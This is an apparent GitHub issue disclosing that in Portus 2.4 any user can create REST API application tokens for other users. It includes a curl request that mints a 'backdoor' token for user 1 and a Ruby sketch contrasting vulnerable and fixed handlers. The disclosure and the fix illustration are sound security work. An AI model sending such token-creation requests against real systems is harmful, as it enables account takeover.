Users can create application tokens for any user via the REST API
claudiocabral opened this issue
Claudio Cabral commented
Description
It seems to me that any user can add application tokens to other users via the REST API.
Steps to reproduce
- Create a new user (can be a bot) without admin privileges, teams or namespaces
- Do a POST request to create a new token for an arbitrary user

```shell
curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}' 'https://portus.mydomain.com/api/v1/users/1/application_tokens'
```

- Get an application token for user 1

```json
{"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"}
```
- Expected behavior: Users cannot create tokens for other users
- Actual behavior: Users can create tokens for other users
Portus version: opensuse/portus:2.4
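As an added illustration (not Portus's code, and not written by the reporter), the Ruby sketch below contrasts the handler shape this report describes, one that authenticates the caller from a `Portus-Auth`-style `username:token` value but never checks that the caller may act on the user id taken from the URL, with one that adds that authorization step before any token is minted. The users, the header parsing and the in-memory token store are all constructed for the example; the real endpoint and data model are assumed only in outline.

```ruby
require 'securerandom'

# Constructed sample data for this example; not Portus's schema.
User = Struct.new(:id, :username, :admin, keyword_init: true)

USERS = {
  1 => User.new(id: 1, username: 'admin', admin: true),
  2 => User.new(id: 2, username: 'sneakyuser', admin: false)
}.freeze

# user_id => list of { 'id', 'application', 'plain_token' } records.
# Seed one token so "sneakyuser:app_token" authenticates (constructed value).
TOKENS = Hash.new { |h, k| h[k] = [] }
TOKENS[2] << { 'id' => 1, 'application' => 'cli', 'plain_token' => 'app_token' }

# Resolve the caller from a "username:token" header value.
# Returns the User, or nil when the pair does not match a stored token.
def authenticate(auth_header)
  username, token = auth_header.to_s.split(':', 2)
  user = USERS.values.find { |u| u.username == username }
  return nil unless user && token
  TOKENS[user.id].any? { |t| t['plain_token'] == token } ? user : nil
end

# The missing rule: a token may be created for a user only by that user
# or by an admin. Authentication alone says nothing about this.
def can_create_token?(actor, target_user_id)
  actor.admin || actor.id == target_user_id
end

# Create and store a token record for user_id (side effect).
def mint_token(user_id, application)
  record = { 'id' => TOKENS.values.sum(&:size) + 1,
             'application' => application,
             'plain_token' => SecureRandom.hex(16) }
  TOKENS[user_id] << record
  record
end

# Vulnerable shape: the caller is authenticated, but the :user_id from the
# URL is trusted as-is, so any valid account can mint tokens for anyone.
def create_token_vulnerable(auth_header, user_id, application)
  actor = authenticate(auth_header)
  return [401, { 'error' => 'unauthenticated' }] unless actor
  return [404, { 'error' => 'not found' }] unless USERS.key?(user_id)
  [201, mint_token(user_id, application)]
end

# Hardened shape: authorize against the target user id before looking it
# up, so an unauthorized caller gets 403 whether or not the user exists.
def create_token_secure(auth_header, user_id, application)
  actor = authenticate(auth_header)
  return [401, { 'error' => 'unauthenticated' }] unless actor
  return [403, { 'error' => 'forbidden' }] unless can_create_token?(actor, user_id)
  return [404, { 'error' => 'not found' }] unless USERS.key?(user_id)
  [201, mint_token(user_id, application)]
end

if __FILE__ == $PROGRAM_NAME
  # Same request as the report's curl: non-admin user 2 targets user 1.
  p create_token_vulnerable('sneakyuser:app_token', 1, 'backdoor') # 201, token issued
  p create_token_secure('sneakyuser:app_token', 1, 'backdoor')     # 403, forbidden
end
```

The point of the split between `authenticate` and `can_create_token?` is that the identity check and the ownership check are separate decisions; an endpoint that only performs the first one is exactly the behaviour the steps above reproduce.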
stale commented
Thanks for all your contributions!
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.
Sisir commented
This is a serious security issue, any update on this?
Lukas Bachschwell commented
?